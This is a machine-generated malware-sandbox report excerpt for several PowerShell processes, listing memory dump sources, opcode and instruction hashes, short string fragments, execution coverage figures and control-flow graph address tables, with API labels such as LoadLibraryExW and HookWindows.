                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 3b129fabb9fe614e34b2eb9605c4841d43dc267eccbf92e8384ecee06aacc63e
                                                                                      • Instruction ID: f6f3300b70d707aa23cb7b037e60f969f7630276544bc35cebbbf99113b8022e
                                                                                      • Opcode Fuzzy Hash: 3b129fabb9fe614e34b2eb9605c4841d43dc267eccbf92e8384ecee06aacc63e
                                                                                      • Instruction Fuzzy Hash: FDD1F431E4CA4A4FEB94DA2C94556BCBBF1FF543A0B5C02BAD40ECB196DA29EC01C741
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: b97d1ceb58366267c75c3d145e99d70282183f5bf70b02ed11ce3568f2979f70
                                                                                      • Instruction ID: dad2f8cc5bb06ef94b9b693a01f7a0e35ef5abaa35fe9be7733842cbb7a37889
                                                                                      • Opcode Fuzzy Hash: b97d1ceb58366267c75c3d145e99d70282183f5bf70b02ed11ce3568f2979f70
                                                                                      • Instruction Fuzzy Hash: B8D10531E4CA894FEB95DB2C94546B9BBF1FF54390B5402BAD44EC319BDA29EC02C741
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: f2c2000638f8d72a1a2000983eb788c738706ffb6b6fe2b17ed643c0823b7537
                                                                                      • Instruction ID: 6f3c98b159e281a97b7b21193c8fc6b0d54b5622a59df007261d635de445b504
                                                                                      • Opcode Fuzzy Hash: f2c2000638f8d72a1a2000983eb788c738706ffb6b6fe2b17ed643c0823b7537
                                                                                      • Instruction Fuzzy Hash: 8FA1D231E4CA4A4FEB95DA2C95546BCBBF1FF543A4B5C02BAD00ECB196DA29EC01C741
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: dd2f634ad38c2cc35e7dea3c75fde27145863376c71e6a89b3f1fc6059f51cfa
                                                                                      • Instruction ID: ceb0155ff3d02684ec239ad69cf8836373979615de89c0468c284b0f2ca1826a
                                                                                      • Opcode Fuzzy Hash: dd2f634ad38c2cc35e7dea3c75fde27145863376c71e6a89b3f1fc6059f51cfa
                                                                                      • Instruction Fuzzy Hash: 09713832E4CA8A5FEBA5DA6C54446B9B7F1FF553A0B0802BAC44EC7197DE199C05C382
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 9607084d4f89885638eaff9643e532071036c21923b25089f3d6152617367a76
                                                                                      • Instruction ID: 8eff390a418d618f4599b64538394360946309ce010e80b72a12985b1d898afd
                                                                                      • Opcode Fuzzy Hash: 9607084d4f89885638eaff9643e532071036c21923b25089f3d6152617367a76
                                                                                      • Instruction Fuzzy Hash: A941073294DB864FEB96DB2848546B9BBF1FF56250B1812FAC04DCB0D7EA199C05C381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6564a50128b34483a7da3bd8719c5a919188809dae89f8cc108da8933159bbe
                                                                                      • Instruction ID: 8520a1185496f9fd91f1762436d052044de325ac5b7aa3049e5d35cebb43fe8f
                                                                                      • Opcode Fuzzy Hash: b6564a50128b34483a7da3bd8719c5a919188809dae89f8cc108da8933159bbe
                                                                                      • Instruction Fuzzy Hash: 9DB1C330508A8D4FEB68DF28D8557E93BE1FF55350F04427EE85DC7292CA78A945CB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43c26ffc3b3c98a7f0be41f0522b3fd8e3a3b680f57a3e1bd59fa7e965f6aaf6
                                                                                      • Instruction ID: aa2a805a7d01cddc033d701cd9e366faf4d9117763733cb65272af3c340323bc
                                                                                      • Opcode Fuzzy Hash: 43c26ffc3b3c98a7f0be41f0522b3fd8e3a3b680f57a3e1bd59fa7e965f6aaf6
                                                                                      • Instruction Fuzzy Hash: 8D51C432E5CA498FE798DB58D8556BD77E2FF99780F04017DE44EC7292CE28AC018782
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8999c1f4df1ad9188916324ee5167c81a2b95c75450f1640caa6636b23cc7695
                                                                                      • Instruction ID: aeb843933a492674073c19f0e52e6045f6410eaf0bce6a64bd659394b66c9e5b
                                                                                      • Opcode Fuzzy Hash: 8999c1f4df1ad9188916324ee5167c81a2b95c75450f1640caa6636b23cc7695
                                                                                      • Instruction Fuzzy Hash: 19311A3085968E8EFBB4AF18CC1ABFD36A2FF45359F404139D40E871A3DE786985CA11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 955fbf317e62c8128288f5f17a23d124c61de64b137bfbf07371ebe02c288e39
                                                                                      • Instruction ID: f2e7707e60c24803af75b309130d207136e8258d0c9c3c848b42ff965181eb0b
                                                                                      • Opcode Fuzzy Hash: 955fbf317e62c8128288f5f17a23d124c61de64b137bfbf07371ebe02c288e39
                                                                                      • Instruction Fuzzy Hash: D401B946B8D9C91FE78A863C98252B43BE2EF96550B4D41F7D44CCB1E2D8085D558391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                                      • Instruction ID: 6d52d37cb80ed66cb9043a51b8ccd48ea06a25d4b947480943b128721102d009
                                                                                      • Opcode Fuzzy Hash: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                                      • Instruction Fuzzy Hash: 7801677115CB0C4FD744EF4CE451AA9B7E0FB95364F10056DE58AC3651DA36E881CB46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f608aeffca74f50365b6bd6ce823e4a144ebfc760c436d8e611e2d872101d1da
                                                                                      • Instruction ID: 9b844fec6dece7f87a6c65f01f6d793cc20db231220beaa2ded84b46cf5bc636
                                                                                      • Opcode Fuzzy Hash: f608aeffca74f50365b6bd6ce823e4a144ebfc760c436d8e611e2d872101d1da
                                                                                      • Instruction Fuzzy Hash: 1301F422B1D94C8FC754E73CD818AAA37E1EF8A640B1940FBD00DCB2A6DD248C06C381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89b5aed711bceaba17042ea35e1f5a11086dc85e13d79864f4da79c95054ee52
                                                                                      • Instruction ID: e3e6c25024e28f7634ef4cc07cc9efa19653180b51eae4d73746bc15c20ea28b
                                                                                      • Opcode Fuzzy Hash: 89b5aed711bceaba17042ea35e1f5a11086dc85e13d79864f4da79c95054ee52
                                                                                      • Instruction Fuzzy Hash: 63F05E33B68C1D5FD794E76CD418BAA22E2EF89750B1541BAD00DC72AADE689C468380
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b5904bf0897acf28d769d564c1b57ff877fb53a728f22ace1f89b3bf8388f433
                                                                                      • Instruction ID: 4d639e052a954bc2b8c83ba49d26785144d008411c181512968a2b9335ef2453
                                                                                      • Opcode Fuzzy Hash: b5904bf0897acf28d769d564c1b57ff877fb53a728f22ace1f89b3bf8388f433
                                                                                      • Instruction Fuzzy Hash: B2B01200BAD83A01A58431D8B0123FCF1405B40660F810470E41DC01C3CD4E5983008B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8,#$P/#$p0#$-#$/#
                                                                                      • API String ID: 0-1420174107
                                                                                      • Opcode ID: 9122d492b900e4524b1c41b8159900e1315817a9018355c3eac3d50c884a5795
                                                                                      • Instruction ID: c253810e4511a7ecdc64b90b3bbbaad45714676f6566f083bb04cc448d449010
                                                                                      • Opcode Fuzzy Hash: 9122d492b900e4524b1c41b8159900e1315817a9018355c3eac3d50c884a5795
                                                                                      • Instruction Fuzzy Hash: 5C317152C8E6C14FE3278678682A17C7F72BF1365071980FBC49C8B1EBD4899E84C356
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (]F$H$4$H$4$H$4
                                                                                      • API String ID: 0-1436280677
                                                                                      • Opcode ID: 7e5518a052998818a7489bbc0a4c6760733350194032a81faaa83e8755690827
                                                                                      • Instruction ID: 745c24cca684296b14a384a66e1f7b251a0a075693715f314c154f9ff445de5b
                                                                                      • Opcode Fuzzy Hash: 7e5518a052998818a7489bbc0a4c6760733350194032a81faaa83e8755690827
                                                                                      • Instruction Fuzzy Hash: 9CA12821E4DA860FE796962C68545B9BBF1FF96290B0C02FBC44DC719BE9199C05C382

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:3
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 9241 7ff887ce6c34 9242 7ff887ce6c3d LoadLibraryExW 9241->9242 9244 7ff887ce6ced 9242->9244

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 64 7ff887da09f2-7ff887da09f7 65 7ff887da0a39-7ff887da0a6d 64->65 66 7ff887da09f9-7ff887da0a26 64->66 69 7ff887da0a73-7ff887da0a7d 65->69 70 7ff887da0c2c-7ff887da0c41 65->70 66->65 72 7ff887da0a96-7ff887da0aa0 69->72 73 7ff887da0a7f-7ff887da0a94 69->73 77 7ff887da0c43-7ff887da0c4a 70->77 78 7ff887da0c4b-7ff887da0c64 70->78 72->70 75 7ff887da0aa6-7ff887da0ab0 72->75 73->72 79 7ff887da0ab2-7ff887da0abf 75->79 80 7ff887da0ac9-7ff887da0ad3 75->80 77->78 81 7ff887da0c66 78->81 82 7ff887da0c68-7ff887da0cb3 78->82 79->80 87 7ff887da0ac1-7ff887da0ac7 79->87 80->70 84 7ff887da0ad9-7ff887da0ae3 80->84 81->82 102 7ff887da0cb5-7ff887da0cb8 82->102 103 7ff887da0cd4-7ff887da0cde 82->103 85 7ff887da0ae5-7ff887da0af3 84->85 86 7ff887da0afd-7ff887da0b08 84->86 85->86 91 7ff887da0af5-7ff887da0afb 85->91 86->70 90 7ff887da0b0e-7ff887da0b18 86->90 87->80 93 7ff887da0b1a-7ff887da0b2a 90->93 94 7ff887da0b2e-7ff887da0b3f 90->94 91->86 93->94 94->70 98 7ff887da0b45-7ff887da0b4f 94->98 100 7ff887da0b51-7ff887da0b66 98->100 101 7ff887da0b68-7ff887da0b7e 98->101 100->101 107 7ff887da0b80 101->107 108 7ff887da0b82-7ff887da0b8b 101->108 102->103 109 7ff887da0cba-7ff887da0cd1 102->109 105 7ff887da0ce0-7ff887da0ce9 103->105 106 7ff887da0cea-7ff887da0d2a 103->106 107->108 110 7ff887da0b8d 108->110 111 7ff887da0b8f-7ff887da0b97 108->111 110->111 115 7ff887da0b9b-7ff887da0ba4 111->115 116 7ff887da0ba6 115->116 117 7ff887da0ba8-7ff887da0bc8 115->117 116->117 120 7ff887da0bca 117->120 121 7ff887da0bcc-7ff887da0be6 117->121 120->121 123 7ff887da0be8 121->123 124 7ff887da0bea-7ff887da0c04 121->124 123->124 126 7ff887da0c06 124->126 127 7ff887da0c08-7ff887da0c29 124->127 126->127
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1B_L$6K:
                                                                                      • API String ID: 0-2684207276
                                                                                      • Opcode ID: e77e40d4c8caa8040aaf179b15a0a243ed31eaafded66ce781c71dc7ee5bbab8
                                                                                      • Instruction ID: d0518b4d728b0ceef2c85947ffa7e9f4c206052228f5083fdeadd49de56d656f
                                                                                      • Opcode Fuzzy Hash: e77e40d4c8caa8040aaf179b15a0a243ed31eaafded66ce781c71dc7ee5bbab8
                                                                                      • Instruction Fuzzy Hash: CDB1F621A0DB854FDB9ADB288854979BBF1FF6A35070902FAC05AC71E7ED14EC45C392

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 202 7ff887da0a2b-7ff887da0a6d 204 7ff887da0a73-7ff887da0a7d 202->204 205 7ff887da0c2c-7ff887da0c41 202->205 206 7ff887da0a96-7ff887da0aa0 204->206 207 7ff887da0a7f-7ff887da0a94 204->207 211 7ff887da0c43-7ff887da0c4a 205->211 212 7ff887da0c4b-7ff887da0c64 205->212 206->205 209 7ff887da0aa6-7ff887da0ab0 206->209 207->206 213 7ff887da0ab2-7ff887da0abf 209->213 214 7ff887da0ac9-7ff887da0ad3 209->214 211->212 215 7ff887da0c66 212->215 216 7ff887da0c68-7ff887da0cb3 212->216 213->214 221 7ff887da0ac1-7ff887da0ac7 213->221 214->205 218 7ff887da0ad9-7ff887da0ae3 214->218 215->216 236 7ff887da0cb5-7ff887da0cb8 216->236 237 7ff887da0cd4-7ff887da0cde 216->237 219 7ff887da0ae5-7ff887da0af3 218->219 220 7ff887da0afd-7ff887da0b08 218->220 219->220 225 7ff887da0af5-7ff887da0afb 219->225 220->205 224 7ff887da0b0e-7ff887da0b18 220->224 221->214 227 7ff887da0b1a-7ff887da0b2a 224->227 228 7ff887da0b2e-7ff887da0b3f 224->228 225->220 227->228 228->205 232 7ff887da0b45-7ff887da0b4f 228->232 234 7ff887da0b51-7ff887da0b66 232->234 235 7ff887da0b68-7ff887da0b7e 232->235 234->235 241 7ff887da0b80 235->241 242 7ff887da0b82-7ff887da0b8b 235->242 236->237 243 7ff887da0cba-7ff887da0cd1 236->243 239 7ff887da0ce0-7ff887da0ce9 237->239 240 7ff887da0cea-7ff887da0d2a 237->240 241->242 244 7ff887da0b8d 242->244 245 7ff887da0b8f-7ff887da0b97 242->245 244->245 249 7ff887da0b9b-7ff887da0ba4 245->249 250 7ff887da0ba6 249->250 251 7ff887da0ba8-7ff887da0bc8 249->251 250->251 254 7ff887da0bca 251->254 255 7ff887da0bcc-7ff887da0be6 251->255 254->255 257 7ff887da0be8 255->257 258 7ff887da0bea-7ff887da0c04 255->258 257->258 260 7ff887da0c06 258->260 261 7ff887da0c08-7ff887da0c29 258->261 260->261
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1B_L$6K:
                                                                                      • API String ID: 0-2684207276
                                                                                      • Opcode ID: 4ccdb53ca10282248d3c970be9a2e42736ad856facc289bd5db5d667894eaf73
                                                                                      • Instruction ID: d4f4cdfde3984a023a3a6cfa7a29e0e3cb60d70da590c0403ec6488ff9ed4db8
                                                                                      • Opcode Fuzzy Hash: 4ccdb53ca10282248d3c970be9a2e42736ad856facc289bd5db5d667894eaf73
                                                                                      • Instruction Fuzzy Hash: D9712530A0CB494FDF89EA288554939BBE2FF6A340B1402BEC45EC7196ED24FC45C791

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 262 7ff887da33d5-7ff887da3464 265 7ff887da346a-7ff887da3474 262->265 266 7ff887da36cc-7ff887da374a 262->266 267 7ff887da3476-7ff887da3483 265->267 268 7ff887da348d-7ff887da3492 265->268 291 7ff887da374c-7ff887da3752 266->291 267->268 275 7ff887da3485-7ff887da348b 267->275 270 7ff887da3670-7ff887da367a 268->270 271 7ff887da3498-7ff887da349b 268->271 273 7ff887da3689-7ff887da36c9 270->273 274 7ff887da367c-7ff887da3688 270->274 276 7ff887da34b2 271->276 277 7ff887da349d-7ff887da34b0 271->277 273->266 275->268 281 7ff887da34b4-7ff887da34b6 276->281 277->281 281->270 282 7ff887da34bc-7ff887da34c3 281->282 285 7ff887da34c5-7ff887da34cb 282->285 285->285 287 7ff887da34cd 285->287 289 7ff887da34cf-7ff887da34d5 287->289 289->289 292 7ff887da34d7-7ff887da34f0 289->292 291->291 293 7ff887da3754 291->293 301 7ff887da34f2-7ff887da3505 292->301 302 7ff887da3507 292->302 295 7ff887da3756-7ff887da375c 293->295 295->295 296 7ff887da375e-7ff887da378b 295->296 304 7ff887da3509-7ff887da350b 301->304 302->304 304->270 306 7ff887da3511-7ff887da3519 304->306 306->266 307 7ff887da351f-7ff887da3529 306->307 308 7ff887da3545-7ff887da3555 307->308 309 7ff887da352b-7ff887da3543 307->309 308->270 313 7ff887da355b-7ff887da3562 308->313 309->308 314 7ff887da3564-7ff887da356a 313->314 314->314 315 7ff887da356c 314->315 316 7ff887da356e-7ff887da3574 315->316 316->316 317 7ff887da3576-7ff887da358c 316->317 317->270 321 7ff887da3592-7ff887da3599 317->321 322 7ff887da359b-7ff887da35a1 321->322 322->322 323 7ff887da35a3 322->323 324 7ff887da35a5-7ff887da35ab 323->324 324->324 325 7ff887da35ad-7ff887da35be 324->325 328 7ff887da35c0-7ff887da35d2 325->328 329 7ff887da35e9 325->329 335 7ff887da35d4 328->335 336 7ff887da35d6-7ff887da35e7 328->336 330 7ff887da35eb-7ff887da35ed 329->330 330->270 331 7ff887da35f3-7ff887da35fb 330->331 333 7ff887da360b 331->333 334 7ff887da35fd-7ff887da3607 331->334 339 7ff887da3610-7ff887da3625 333->339 337 7ff887da3627-7ff887da362e 334->337 338 7ff887da3609 334->338 335->336 336->330 340 7ff887da3630-7ff887da3636 337->340 338->339 339->337 340->340 343 7ff887da3638-7ff887da3656 340->343 346 7ff887da365d-7ff887da366f 343->346
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 5ec97eb3407716bdefef98ce2511388da62be540dffc74cbe9f9c248a112ce65
                                                                                      • Instruction ID: 985daed11836aa36d6cb56fe2385c799a057e044d59f0fbfe3a588219cb93b30
                                                                                      • Opcode Fuzzy Hash: 5ec97eb3407716bdefef98ce2511388da62be540dffc74cbe9f9c248a112ce65
                                                                                      • Instruction Fuzzy Hash: E0D12632D4DA8A5FEB95DB6888155B9BBF2FF16390B0802BED04EC71D7DA18A805C351

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2132984830.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887cd0000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
Similarity
• API ID:
• String ID: bJ$ bJ$ bJ$07K:$07K:
• API String ID: 0-2473794636

Execution Graph

Execution Coverage: 10.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 21
Total number of Limit Nodes: 1

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
Similarity
• API ID:
• String ID: bJ$ bJ$07Xo
• API String ID: 0-3804966415

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
Similarity
• API ID:
• String ID: bJ
• API String ID: 0-3573994042
Memory Dump Source
• Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID: